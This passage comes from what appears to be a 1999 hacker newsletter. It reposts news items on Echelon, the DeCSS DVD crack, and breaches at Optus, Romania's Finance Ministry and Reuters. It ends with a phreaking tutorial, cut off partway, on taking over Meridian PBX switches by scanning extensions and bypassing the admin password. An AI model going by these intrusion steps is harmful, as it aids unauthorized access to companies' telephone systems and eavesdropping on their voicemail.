doesn't show up in the dialog box since it's a virtual device driver (VxD)
and not an application. So, if it's watching you, you're out of luck.
To make sure you don't get spied on, change your passwords frequently, and
work on confidential or incriminating files on your home PC. IK97 might be
watching.
@HWA
18.0 Hoax: Gov-boi Killed in Car Accident (not)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by deepquest, Cruciphux and mosthated
Gov-boi, aka Insanity (Rick Stoeppelwerth), of
http://www.hack.co.za passed away Sunday night in a
terrible car accident. His loss is a tragedy and his
security expertise will be greatly missed by all who knew
him. He was known on irc as gov-boi or hotmetal.
http://www.hack.co.za/
The Stamford Advocate
http://www.stamfordadvocate.com/Advocate/release/10-31-1999/article1.html
Gov-boi pulled one over on us, and put up a notice on his website saying
that he had died in a car accident after a discussion on IRC where it was
suggested he be a 'ghost hacker' for halloween. So he took it one step
further and pretended he had passed away, staying off irc with his nick ppl
assumed it was true, there was also an article (Stamford advocate) that
was attached to the story which is actually about some other poor soul that
died around the same time gov-boi was supposed to have died. I emailed the
story to hackernews and apparently so did several other ppl who were sucked
in to the story before finding out it was all a hoax.
Insanity however (Rick Stoeppelwerth) did die in a car crash and it was the
story that added credence to the claim, although Stamford is a long way from
.za (South Africa) where gov-boi lives. Sorry to all involved for providing
incorrect info and condolences to Insanity and his family for their loss.
@HWA
19.0 Australia Admits to Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no-one
The Inspector General of Intelligence and Security for
Australia, Bill Blick, has told the BBC that Australia's
Defense Signals Directorate (DSD) is indeed part of the
global eavesdropping network known as Echelon. Both
the US and Britain still deny the existence of this
network.
BBC
http://news.bbc.co.uk/hi/english/world/newsid_503000/503224.stm
World
Global spy network revealed
Listening in to your phone calls and reading your emails
By Andrew Bomford of BBC Radio 4's PM
programme
Imagine a global spying network that can eavesdrop on
every single phone call, fax or e-mail, anywhere on the
planet.
It sounds like science fiction, but it's true.
Two of the chief protagonists - Britain and America -
officially deny its existence. But the BBC has
confirmation from the Australian Government that such a
network really does exist and politicians on both sides of
the Atlantic are calling for an inquiry.
On the North Yorkshire moors above Harrogate they can
be seen for miles, but still they are shrouded in secrecy.
Around 30 giant golf balls, known as radomes, rise from
the US military base at Menwith Hill.
Linked to the NSA
Inside is the world's most sophisticated eavesdropping
technology, capable of listening-in to satellites high
above the earth.
The base is linked directly to the headquarters of the US
National Security Agency (NSA) at Fort Mead in Maryland,
and it is also linked to a series of other listening
posts scattered across the world, like Britain's own GCHQ.
The power of the network, codenamed Echelon, is
astounding.
Every international telephone call, fax, e-mail, or radio
transmission can be listened to by powerful computers
capable of voice recognition. They home in on a long list
of key words, or patterns of messages. They are looking
for evidence of international crime, like terrorism.
Open Oz
The network is so secret that the British and American
Governments refuse to admit that Echelon even exists.
But another ally, Australia, has decided not to be so
coy.
The man who oversees Australia's security services,
Inspector General of Intelligence and Security Bill Blick,
has confirmed to the BBC that their Defence Signals
Directorate (DSD) does form part of the network.
"As you would expect there are a large amount of radio
communications floating around in the atmosphere, and
agencies such as DSD collect those communications in
the interests of their national security", he said.
Asked if they are then passed on to countries like Britain
and America, he said: "They might be in certain
circumstances."
But the system is so widespread all sorts of private
communications, often of a sensitive commercial nature,
are hoovered up and analysed.
Journalist Duncan Campbell has spent much of his life
investigating Echelon. In a report commissioned by the
European Parliament he produced evidence that the
NSA snooped on phone calls from a French firm bidding
for a contract in Brazil. They passed the information on
to an American competitor, which won the contract.
"There's no safeguards, no remedies, " he said, "There's
nowhere you can go to say that they've been snooping
on your international communications. Its a totally
lawless world."
Breaking the silence
Both Britain and America deny allegations like this,
though they refuse to comment further. But one former
US army intelligence officer has broken the code of
silence.
Colonel Dan Smith told the BBC that while this is
feasible, it is not official policy: "Technically they can
scoop all this information up, sort through it, and find
what it is that might be asked for," he said. "But there is
no policy to do this specifically in response to a
particular company's interests."
Legislators on both sides of the Atlantic are beginning to
sit up and take notice. Republican Congressman Bob
Barr has persuaded congress to open hearings into
these and other allegations.
In December he is coming to Britain to raise awareness
of the issue. In an interview with the BBC he accused
the NSA of conducting a broad "dragnet" of
communications, and "invading the privacy of American
citizens."
He is joined in his concerns by a small number of
politicians In Britain. Liberal Democrat MP Norman
Baker has tabled a series of questions about Menwith
Hill, but has been met with a wall of silence.
"There's no doubt it's being used as a listening centre,"
he said, "There's no doubt it's being used for US
interests, and I'm not convinced that Britain's interests
are being best served by this."
@HWA
20.0 DVD Copy Protection Broken
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Because developers implemented the copy protection
scheme of DVD disks improperly it was easily broken.
One DVD content publisher failed to encrypt the
decryption key on their disks. This allowed the Masters
of Reverse Engineering (MoRE) from Norway, to 'guess'
other publishers keys. They then developed the DeCSS
utility that can copy a DVD movie.
Wired
http://www.wired.com/news/technology/0,1282,32263,00.html
Why the DVD Hack Was a Cinch
by Andy Patrizio
2:15 p.m. 2.Nov.1999 PST
The anonymous developers of the decryption program that removes DVD copy
protection had an easy time doing it, thanks to a gaffe by a software
developer and the surprising weakness of the encryption technology.
Essentially, the two European hackers who developed the DeCSS utility that
copies a DVD movie disc were able to break the code because one of the
product's licensees inadvertently neglected to encrypt the decryption key.
Industry experts were stunned by the hack because DVD as a movie-playing
format is supposed to be copy-proof. In fact, DVD would not be on the
market today without the permission of the motion picture industry which,
sources say, is reeling from this development.
Breaking DVD's encryption was considered extremely difficult, but once the
first key was discovered, the rest fell with ease, since the crackers were
able to use their original, valid key as a launch point to find more valid
decryption keys.
DeCSS is a tiny (60 KB) utility that copies the encrypted DVD video file,
which has a .VOB extension, and saves it to the hard disc without
encryption.
Since DVD movies can range in size from 4.7 GB to 9.4 GB and recordable
DVD has at best 2.5 capacity (or 5.2GB for double-sided discs), direct DVD
copying is unfeasible. But starting next year, 4.7 GB recordable DVD
drives will hit the market, making duplication of DVD discs much
easier.
DVD uses a security method called the Content Scrambling System. CSS is a
form of data encryption used to discourage reading media files directly
from the disc without a decryption key. To descramble the video and audio,
a 5-byte (40-bit) key is needed. Every player -- including consoles
from Sony, Toshiba, and other consumer electronics vendors, as well as
software vendors for PCs like WinDVD and ATI DVD -- has its own unique
unlock key. Every DVD disc, in turn, has 400 of these 5-byte keys stamped
onto the disc. That way, the unlock key from every licensee, be it WinDVD
or a Pioneer DV-525 unit, will read the disc.
All licensees of DVD technology have to encrypt their decryption key so no
one can reverse-engineer the playback software and extract the key.
Well, one licensee didn't encrypt their key. The developers of DeCSS, a
Norwegian group called MoRE (Masters of Reverse Engineering) got a key by
reverse-engineering the XingDVD player, from Xing Technologies, a
subsidiary of RealNetworks.
"We found that one of the companies had not encrypted their CSS decryption
code, which made it very easy for us," said Jon Johansen, a founder of
MoRE, in Norway. "We didn't think it would be that easy, in fact."
RealNetworks did not return repeated calls requesting comment.
Because the unlock key is 5 bytes long, Johansen and his two partners, who
wish to remain anonymous, were able to guess a whole slew of other keys.
So even if all future DVD movies remove the Xing key, DeCSS has a plethora
of other keys to choose from.
Johansen and his partners were able to guess more than 170 working keys by
trial and error before finally just giving up to go do something else. "I
wonder how much they paid for someone to actually develop that weak
algorithm," said Johansen. "It's a very weak encryption algorithm."
Leaving such a weak link in the security chain surprised industry people.
"I am really surprised that they made it that easy to break into," said
Kevin Hause, senior analyst with International Data Corp. "One of the key
concerns about DVD was security."
"I don't think it's the end of the world, but it'll be interesting to see
what steps the industry takes now, whether they start delaying the
releases of certain titles," said Bill Hunt, webmaster of The Digital
Bits, a DVD news site.
"I would expect it could also delay the advent of recordable DVD, because
it'll give people a medium to write these hacked video files."
Others aren't so talkative. The Motion Picture Association of America
(MPAA) declined to comment. The DVD Forum, based in Japan, was unreachable
due to a national holiday, but it did issue a carefully worded statement.
"The circulation through the Internet of the illegal and inappropriate
software is against the stream of copyright protection. Toshiba, which has
led the establishment of the DVD format and is the chair-company of the
DVD Forum, feels it is a great pity," wrote Masaki Mikura, manager
of the strategic partnership and licensing division at Toshiba Ltd.
"In the future, the laboratories will be more actively conducting strict
surveillance and take counter measures against illegal, inappropriate
software and hardware in the market. Moreover, we believe that, based on
the recent
legislation, legal measures and steps will be taken by copyright holders
against such violation of intellectual properties," Mikura wrote.
@HWA
21.0 Optus in Australia Compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by DogCow
Cable and Wireless Optus/Microplex in Australia suffered
what they called an "unauthorized intrusion" at 4:30am
AEST Nov, 3rd. According to a press release on the
matter, the intruders had "limited access to details of
Optus and Microplex customers [but] did not include
access to any customers' financial information". Tech
support staff indicated that a username/password list
was posted to a Usenet group.
Rumours suggest that the targeting of Optus may have
been inspired by the upcoming Republic referendum in
Australia, and it is unclear if the incident is related to
the Cable and Wireless breach in October.
Australia Broadcasting Company
http://abc.net.au/news/1999/11/item19991103191554_1.htm
Optus Press Release
http://www.2600.org.au/advisories/optus-1199.txt
ABC;
Optus calls police after ISP breached
One of Australia's largest Internet service providers has
been forced to advise all customers to change their
passwords after a major security breach was uncovered
this morning.
Cable and Wireless Optus called in police after what it
calls "an unauthorised intrusion" into its system, but angry
customers say the breach was the company's own fault.
The company operates under the Optusnet, Microplex and
DingoBlue banners, and a huge file containing all the login
passwords was made available to anyone who wanted
them.
Optus says as soon as its staff were made aware of the
breach, it moved to close the security loophole.
However, it took the company nearly 18 hours before it
alerted its 100,000 customers via an email that their
passwords could no longer be considered secret and
should be changed immediately.
http://www.currents.net/newstoday/99/11/05/news7.html
Daily News
ISP Network Hacked
By Adam Creed, Newsbytes.
November 05, 1999
The Internet service provider (ISP) network of Australia's second
largest telecommunications provider Cable & Wireless Optus
Ltd [AUS:CWO] suffered a major security breach on
Wednesday, with customer account details posted on the
Internet.
The attack occurred at 4.30am Australian Eastern Daylight
Time (AEDT), with user names and passwords of OptusNet and
Microplex ISP customers posted on a Usenet news group.
Cable & Wireless Optus said that no customer credit card
details were made available.
The telco informed the police, but according to local media
reports failed to alert its 100,000 or more customers that their
passwords had been compromised and should be changed until
18 hours later.
Commenting on the delay, Tony Hill, executive director of the
Internet Society of Australia (ISOC-AU), said the Internet user
group was concerned, and that Cable & Wireless Optus
claimed that every effort was made to inform customers once
the breach was repaired and police were notified.
"ISOC-AU is concerned at reports that there may have been a
delay in advising customers of the intrusion," Hill told
Newsbytes. "Early advice to Internet users in this circumstance
is paramount so that they can take action to protect their
passwords, accounts and personal information."
Cable & Wireless Optus said in a statement that it immediately
closed the breach and is now reviewing and stepping up
security procedures.
"Although this intrusion has caused only minimal customer
impact, Cable & Wireless Optus is continuing to assess the
position to ensure customers are not in any way
disadvantaged," said the company, in a statement.Daily News
Optus press release;
Optus Internet Intrusion, 3rd November, 1999
--------------------------------------------
Advisory:
---------
The following Cable and Wireless press release was made available to
the media on November 3rd, 1999, and is being posted here purely
as a convenience given that as of 10pm AEST, it had not been made
available in any "Media" or "Press Release" areas on Cable & Wireless
/Optus/Microplex websites. The story had, by this stage been covered
by the Australian Broadcasting Corporation and radio station 2GB in
Sydney, among other outlets.
The press release was finally placed on the Optus site today (4th Nov)
at the following URL:
http://www.cwo.com.au/company/newsArticle.asp?articleId=137
Coverage:
---------
ABC: http://abc.net.au/news/1999/11/item19991103191554_1.htm
SMH: http://www.smh.com.au/news/9911/04/national/national2.html
Newswire: http://www.newswire.com.au/9911/breach.htm
Press Release:
--------------
Cable and Wireless Optus
Media Statement
3 November, 1999
Optus Internet Intrusion
At 4:30am today, there was an unauthorised intrusion info the Optus
Internet and Microplex network.
Cable and Wireless views this intrusion as a serious breach of security
and has informed the police.
The intrusion allowed limited access to details of Optus Internet and
Microplex customers. It did not allow access to any customer's financial
information.
Cable and Wireless Optus took immediate action on confirmation of the
breach, preventing any further access.
Although this intrusion has cause only minimal customer impact, Cable
and Wireless Optus is continuing to access the position to ensure customers
are not in any way disadvantaged. The company is reviewing all security
procedures to continue to protect the safety and integrity of customer
information.
Press release ends.
Notice:
-------
2600 Australia has chosen to mirror this document because a number of our
colleagues use Cable & Wireless / Optus / Microplex for Internet access
and/or related services. It hence serves as an advisory for them in the
absence of information from Cable & Wireless that details the nature of
the intrusion and the size of the database of customer information exposed
as a result of the breach.
Document last modified: 7:21pm, 4th November, 1999
@HWA
22.0 Romanian Finance Ministry Hit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by AlienPlaque
Intruders electronically broke into the Romanian Finance
Ministry website, modifying and adding taxes, and
changing the official exchange rate of the leu to 0.5 per
dollar from 16,870 per dollar. One tax was created for
'stupidity' and some taxes where raised to 100%. The
Finance Ministry is investigating "how this...was
possible."
C|Net
http://news.cnet.com/news/0-1005-200-1427148.html?tag=st.ne.ron.lthd.1005-200-1427148
The UK Register
http://www.theregister.co.uk/991102-000016.html
CNET;
Hackers wreak havoc on Romanian Web site
By Bloomberg News
Special to CNET News.com
November 2, 1999, 9:35 a.m. PT
BUCHAREST--Romania's Finance Ministry said it will investigate how hackers
tapped into its Web site and changed tax laws and the leu's exchange rate.
The Web site last weekend showed a tax on "silliness" that varied
according to the importance of the taxpayer's job. For one day, the Web
site said, monthly wages of as much as 1 million lei ($59.14) would be
taxed 100 percent. It also changed the official exchange rate of the leu
to 0.5 per dollar from 16,870 per dollar.
The ministry "took immediate measures to restore the Web site's contents
and will take further measures to make sure similar situations don't occur
in the future," the ministry said in a statement. "The log files of our
server are currently being analyzed and investigated to find out how
this
was possible."
Romania does not have legislation to prevent and punish Internet crime,
although police have reported thousands of cases of Western companies
filing complaints of Romanian hackers buying from the Internet using
forged credit card numbers.
Copyright 1999, Bloomberg L.P. All Rights Reserved.
UK Register;
Posted 02/11/99 4:10pm by Linda Harrison
Hackers tax the stupid
Romanian pranksters have hacked into a government Web site to levy a tax on the
stupid.
The group broke through top level security at the Romanian finance ministry's
site to change government information.
One of their alterations included placing a tax on stupidity. And the more
important the person, the higher the tax.
The cash collected from this would then be used to bribe NATO into accepting
Romania into the fold, according to the new look Web site.
Romanian officials said they had started an investigation into the security
breach.
A group of UK hackers were also believed to have tried a similar attempt on
their own government's Central Office of Information Web site.
However, they were forced to abandon the task after the site crashed repeatedly
due to "hardware problems". ®
@HWA
23.0 Reuters News Database Compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Alexander Vorobyov from the The Russian Interior
Ministry has informed the TAS news Agency that a
group or individual known as Kentavr had gained illegal
satellite news feeds from the Reuters News Service.
Russian officials have labeled this case as the most
sophisticated intellectual property crime recently
committed in Russia. (Information presented here was
translated from Russian so there may be some
inaccuracies.)
ITAR TAS
http://library.northernlight.com/FC19991102530000207.html?cb=0&dx=1006&sc=0#doc
Moscow hackers gain access to Reuters data base (adds)
Story Filed: Tuesday, November 02, 1999 4:15 PM EST
MOSCOW, November 2 (Itar-Tass) -- The Russian Interior Ministry's
department for struggle against economic crime in the sphere of
intellectual property has exposed a criminal group reported to have gained
illegal access to the data base of Britain's Reuters news agency, press
secretary of the Russian Chief Administration for Struggle against
Economic Crime Alexander Vorobyov told Tass on Tuesday. The so-called
Kentavr dealing centre was based on a computer class of a Moscow school.
A former Reuters employee has been reported to be involved in the crime.
The Russian law-enforcement bodies have already informed the British
agency about Kentavr having picked the safety software locks and used the
information of the agency to their own advantage.
Head of the Russian department for struggle against crime in the sphere of
intellectual property Mikhail Sukhodolsky told Tass that about a year ago,
Kentavr had signed a contract with the economic department of Reuters, and
under the contract was granted computer hardware and software,
including the passwords to the agency's data base. Later, the company
misappropriated the computer equipment and "disappeared" having stopped
paying for the Reuters' information. Kentavr then "picked" the safety
locks of the agency and gained illegal satellite-supported access to
stock-exchange automated quotations and facilities of Reuters.
Kentavr was reported to have rented a floor in a Moscow school. The
company entered into criminal collusion with the school administration,
which helped to misappropriate 40 personal computers originally bought to
equip a computer class at the school.
The dealing centre then advertised in the media that it would provide for
low-price access to Reuters network. The police are now after natural and
law persons having signed contracts with Kentavr.
According to Reuters security service, the damage done by Kentavr has
exceeded 3 million dollars.
According to Vorobyov, the so called dealing centre had been operating
without even having registered as a law person. At the same time, the
law-enforcement officers were reported to have found documents providing
ample evidence of the company having its own bank operating
underground, and evading taxes.
The Russian Interior Ministry has qualified that criminal case as a major
and most sophisticated crime recently committed in Russia in the sphere of
economic crimes against intellectual property.
Copyright © 1999, ITAR/TASS News Agency, all rights reserved.
@HWA
24.0 Taiwan Vulnerable to Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Senior officials in the Taiwanese Defense Ministry are
warning that electronic threats from China and other
nations will increase dramatically over the next few
years. They are asking that Taiwan create a special
military cyber force to repel such attacks.
Associated Press
http://library.northernlight.com/EC19991102930000021.html?cb=0&dx=1006&sc=0#doc
Title: Taiwan Vulnerable to Cyber Attacks
Summary: TAIPEI, Taiwan (AP) -- In five years, China could be able to use
computer viruses, hackers and other types of cyber warfare to break
down Taiwan's defenses and prepare for an invasion, the Taiwanese
military said Tuesday.
Source: AP Online
Date: 11/02/1999 15:37
Price: Free
Document Size: Very Short (0299 words)
Document ID: EC19991102930000021
Subject(s): Asia
Document Type: Articles & General info
Taiwan Vulnerable to Cyber Attacks
Story Filed: Tuesday, November 02, 1999 3:37 PM EST
TAIPEI, Taiwan (AP) -- In five years, China could be able to use computer
viruses, hackers and other types of cyber warfare to break down Taiwan's
defenses and prepare for an invasion, the Taiwanese military said Tuesday.
Taiwan's economy, government and military are highly dependent on
computers and could be vulnerable to a high-tech assault, the official
Central News Agency quoted Chang Jia-sheng of the Defense Ministry as
saying.
Chang said Taiwan should form a team of experts to prepare the island for
possible cyber warfare, the agency reported.
China's cyber arsenal could include computer viruses, hackers and
electromagnetic pulses that would disrupt communication networks and
create chaos, he said.
The high-tech weapons could quickly take out their targets without much
expense or loss of life, Chang said. They could destroy public morale,
spread disinformation and cause instability, giving China an excuse to
move in and take over the island, he said.
Chang said that although China is technologically backward, it has been
able to ``leap frog'' in the past and quickly acquire technology for
nuclear weapons, intercontinental ballistic missiles and satellites.
Acquiring the ability to use cyber warfare against Taiwan by 2005 is
within China's reach, he said.
China and Taiwan have been ruled by separate governments since they split
during a civil war in 1949. Beijing considers the island to be a breakaway
province and has repeatedly threatened to use force to reunify the two
sides if Taipei seeks formal independence.
Taipei has said it will gradually reunify with China once the mainland
becomes democratic and more economically developed.
Copyright © 1999 Associated Press Information Services, all rights reserved.
@HWA
25.0 30,000 Virus Threats Received by Authorities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by standard
The Gartner Group claims that the FBI and other law
enforcement agencies have logged more than 30,000
threats regarding viruses to be released at the start of
the new millennium. (I guess the Y2K bug is no longer
sensational enough.)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2386686,00.html?chkpt=zdhpnews01
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Happy New Year: Y2K viruses ready
By Reuters
November 2, 1999 12:34 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2386686,00.html?chkpt=zdnnstop
More than 30,000 threats from computer hackers and virus writers who say
they will release new viruses to herald the new year and the new
millennium have been logged by the FBI and other law enforcement groups,
said Lou Marcoccio, worldwide research director at the technology
consulting firm Gartner Group.
"Most of these threats will probably amount to nothing,'' Marcoccio told
Reuters after addressing a community banking industry convention in
Orlando.
"But if just five or 10 viruses are released at the same time, that would
overwhelm the ability of ... companies that produce the fixes. It
could cause substantial productivity losses.''
In the case of the Melissa virus earlier this year, most computer users,
whether individuals or corporations, were able to protect their
e-mail and messaging systems because code writers could replicate the
virus and distribute the fixes before the virus' release date.
"But these companies can't work on 10 fixes at once,'' Marcoccio said.
Most computer viruses are the work of amateur hackers who are known to one
another and gain status by releasing new and successful viruses, he
said.
Jan. 1 an appealing target The date Jan. 1, 2000, presents a very
appealing target date for such viruses.
"A lot of these guys don't even care if they get arrested. They just want
to be remembered,'' Marcoccio said.
Marcoccio was in Orlando to speak to the America's Community Bankers
annual convention. He told the group that a Gartner Group survey of
14,000 people showed that 67 percent of all Americans say they plan to buy
seven to 18 days of worth of food and other supplies within three days of
Jan. 1.
Public anxiety is way ahead of the actual Y2K threat, according to the
assessment of Gartner Group researchers and most other experts.
They expect computer problems to be minor, for the most part, with many
Y2K problems detected in November and December of this year as
date-forward transactions begin to uncover gaps in system
protections.
@HWA
26.0 Stupid User Mistakes (are a) Bigger Problem than Viruses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by EvilWench
A survey by Broadcasters Network International has
found that accidental deletions of data cause far more
problems than viruses or system crashes.
CMP TechWeb
http://www.techweb.com/wire/story/TWB19991029S0008
User Errors Are Key Reason For Data Loss
By Mitch Wagner, InternetWeek
Oct 29, 1999 (10:46 AM)
URL: http://www.techweb.com/wire/story/TWB19991029S0008
Accidental deletions are the chief cause of lost data, far exceeding
viruses as a cause of bygone bits, a survey found. "The vast majority of
the systems managers' data loss occurs because of accidental deletions,
not viruses, not systems crashes," said Phil Proffit, an analyst at
Broadcasters Network International, the analyst company that conducted the
research.
In a sample of 300 Windows NT systems managers, 88 percent said accidental
deletions were the leading cause of lost data, followed by 7 percent
blaming intentional deletions, and a scant 3 percent blaming viruses. Most
IT managers said they had suffered a critical loss of data as a
result of an accidental deletion (69 percent).
"I believe it," said Todd Dion, vice president of technology at Tutor
Time, a chain of child care centers that hosts its systems on Windows NT
servers.
Dion said he's encountered viruses a handful of times, but lost data as a
result of user error is a regular occurrence.
For example, one employee in Tutor Time's accounting department regularly
copies reports to a floppy and then immediately copies them back to the
hard disk, and about once a month, copies the old version on the floppy
over the new version on the hard disk, and, ultimately, needs
rescuing. In another instance, a consultant upgrading accounting systems
erased an entire folder of records and then overwrote the folder with old
data.
"The CFO called me in at 11:30 on Friday night, and I swear, I expected to
find his hands around the consultant's throat," Dion said.
While many systems managers seek to avoid such problems by routinely
backing up user data, IT managers were evenly split on whether that
provides complete protection against data loss.
Of the 48 percent who said backups provide incomplete protection, a bit
more than half said the reason is data can be lost between backups (55
percent). Another source of problems is backups are not always reliable
and sometimes do not work properly (26 percent). But a good regimen
of backups can minimize risk, Proffit said.
IT managers should install and use backup products, such as Veritas'
Backup Exec and Computer Associates' ARCserve IT. Both can be managed by
the IT manager rather than trusting the user to make a backup, because the
user is not likely to do it. IT managers should also install "undelete"
products for NT, such as Symantec Norton Utilities 2.0 for Windows NT and
Undelete for Windows NT from Executive Software.
@HWA
27.0 Echelon Education Website Launched
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Lord of the Flies
xechelon.org's purpose is to inform people of Echelon's
existence and provide them tools and information with
which they can loudly object to and thwart this
pervasive government surveillance network.
xechelon.org
http://xechelon.org/
@HWA
28.0 FTC Says Screw You and Your Privacy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by pDick
Orson Swindle, Commissioner of the FTC has said he
would lead the charge to prevent regulations regarding
privacy. He went on to say that the consumer should be
the guard of his own privacy. (Someone needs to give
this guy an education. With companies like
RealNetworks ripping your information without your
knowledge we need laws. How can the consumer hope
to guard himself against something he does not know
about?)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2387484,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
FTC commissioner: No privacy regs
By Lisa M. Bowman, ZDNN
November 3, 1999 12:59 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2387484,00.html
Don't expect the Federal Trade Commission to jump in anytime soon to
prevent debacles such as the RealNetworks Inc. privacy snafu -- not if
commissioner Orson Swindle has his way.
Swindle, one of four commissioners on the agency that enforces consumer
protection laws, said he would be "leading the charge" to prevent
regulation regarding privacy, even though RealNetworks (Nasdaq:RNWK)
angered many customers after a security expert discovered it was tracking
users' music listening habits without their knowledge.
"The consumer ultimately is the guard of his own privacy," said Swindle,
speaking before a group of Silicon Valley attorneys at an event
sponsored by law firm Wilson, Sonsini, Goodrich & Rosati in Palo Alto,
Calif. "The government cannot take care of everybody."
In July, the FTC approved a report recommending that Congress not regulate
collection of private data, and Swindle said that stance should
remain the same. "The private sector has the motivation: Good privacy
practice is good business," he said.
FTC regs confined to children The only Internet privacy issue the
FTC has embraced so far has involved children under 13 years of age.
Two weeks ago, the commission issued a set of rules that require sites to
get parental permission if they want to sell or share personal
information to other companies.
Swindle, who's known to oppose many kinds of regulation, surprised people
by jumping behind the unanimous vote supporting the new rules.
However, under the guidelines, the sites still are free to collect
personal information of all kinds if they only plan to use it internally.
U.S. companies are facing somewhat of a conundrum as they try to do
business with companies in the European Union, which holds
individual privacy in much higher regard.
Swindle, who was held as a POW in Vietnam for six years and also served as
a spokesman during Ross Perot's 1992 presidential bid, embraces the
same hands-off policy for Internet taxation that he does for privacy.
During his speech he told audience members, many of them tax attorneys,
that adding special taxes to Internet transactions could slow down
the tech economy, which he said is "roaring like a house afire."
"Any misstep on our part will have great consequences," he said. "It could
literally choke off innovation."
Swindle supports McCain bill The Clinton administration took a
similar stance last year. In October 1998, President Clinton signed a bill
that, among other things, placed a three-year moratorium on Internet
taxes.
In particular, Swindle said he supports a bill by presidential candidate
Sen. John McCain, R-Ariz., that would permanently ban Internet sales
taxes and urge the World Trade Organization to adopt a global moratorium
on them.
Swindle did raise concerns about privacy at one point, but he tied them to
taxation. He said consumer privacy could be violated by huge
databases that would be required to keep track of
people's purchases as the goods that they buy move through various taxing
authorities.
@HWA
29.0 ParseTV to Adopt New Format
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Micheal
After posting our rumor yesterday HNN received this
email:
"After a year and a half, Parse and its host Shamrock
have parted ways. The split was amicable. Within the
next few weeks, Pseudo will be launching
"ParseTV.com", the digital subCULTure channel. As we
prepare programming for Parsetv, we are committed to
working with hosts and producers who can devote the
time necessary to make Parse a top resource for
hacking culture and technical information related to
hacking and security. Unfortunately, Shamrock was
unable to make such a commitment at this time.
I myself, still believe that Shamrock has a very valuable
role to play in hacker media. His outspokenness and
pranks were refreshing to the community. Perhaps down
the road, he might return to Parse in an undetermined
role, but that will have to be worked out at some later
date. Additionally, I want to state that his departure so
soon after the airing of the MTV hacker show is purely
coincidental."
- Rinz, Producer of Parsetv.com"
Parsetv.com
30.0 Meridian I hacking by BL4CKM1LK teleph0nics
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
. .. ... .......... BL4CKM1LK teleph0nics .......... ... .. .
. .. ... .......... http://hybrid.dtmf.org ......... ... .. .
So close it has no boundaries...
A blinking cursor pulses in the electric darkness like a heart coursing with
phosphorous light, burning beneath the derma of black-neon glass. A PHONE
begins to RING, we hear it as though we were making the call. The cursor
continues to throb, relentlessly patient, until...
Meridian I Switch and Trunk Interception.......... ..... ... .
An account of how an ENTIRE companys PBX.......... ..... ... .
can be taken over (The hardcore phreak way)....... ..... ... .
by hybrid <hybrid@dtmf.org hybrid@ninex.com>...... ..... ... .
Hi. I'm not going to write a mad big introduction to this article, because
I dont feel their is a need for one. All I want to say here is that this
article is intended for the more "hardcore" phreak, yes, hardcore phreak, not
for lame ass calling card leeching kiddies who call themsleves phreaks. If
you are intersted in hacking telephony switches, and you have prior/prefixed
knowledge of Meridian, read on..
Through my experience, I've seen alot of meridian admins go through many
different and sometimes repetitive lengths to supposidly secure an internal
PSTN connected PABX. In this article I'm going to share my knowledge of
PBX switch hacking, and enlighten you to the intricate techneques that can
be used to "trunk hop" etc. The information provided in this article has been
obtained from my own personal accounts of hacking telephony switches, which
I'd like to state, I don't participate in anymore.
Now, for the sake of timesaving, I'll setup a possible scenario.. Consider
the following:
o You have stumbled accross a nice Meridian Mail system, which you
have already compromised by finding yourself a few boxdes in their.
You discover that the Meridian Mail system you have gained access
to belongs to a certain telco, and is used for internal
communication between emloyees high up in the hierarchial chain.
Now, any "normal" phreak would gradually take over the system by finding as
many free boxes as possible and hnading them over to friends, or would keep
the nice lil' system to themselves as a means of obtaining information about
the telco that owns the PBX, via the the means of eavesdroping on used
voicemail boxes. This is a very primitive form of remote eavesdroping, which
this file is not designed to illistrate.
Meridian PBX systems are all administered by a primary system console, which
can be remotely accessed by many different protocols. The most popular of
which is remote dialup via assigned extensions. If the companys main switch
is centrex based, it is likely that the meridian admin console is accessable
via IP on the companys intranet. If you manage to gain access to the
actual switching conponment, you are likely to have the following privalges
on the meridian based network:
o 100% control over every single inbound/outbound trunk group
o Access to every single voicemail box on the switch
o Access to trunk/group/node administration
Basically, the meridian administration module is designed to make the admin
(or whoever has access to it) GOD over the entire system, I say GOD because
you could do anything you wanted, as far as your telephony derived
imagination extends. OK, enough of this.. I'm just going to stop going on
about what if's for the time being, now I'm going to concentrate on the
factual based information, and how one would go about accessing such a
switch.
The simpilist way to find the internal dialup to a meridian switch is to
scan the internal extensions which the switch controls. It's generaly a
good idea to begin scanning network/node extensions such as 00,01,02,03[xx]
etc. What you are looking for is a modem carrier, which when you connect
should ask you for a singular password, which in most cases is bypassed
by hitting control-SD. Once you are in, you should recieve the switches
command line prompt, somthing similar to this:
>
or
SWITCH0>
OMG, I hear you think.. It looks like a DMS switch prompt.. Well, it is, in
a funny kind of way. Meridian switches are designed to emualte certain levels
of DMS-100 O/S types, so you'll find that many of the BCS leveled commands
that you know from DMS will be usefull here. The information that follows
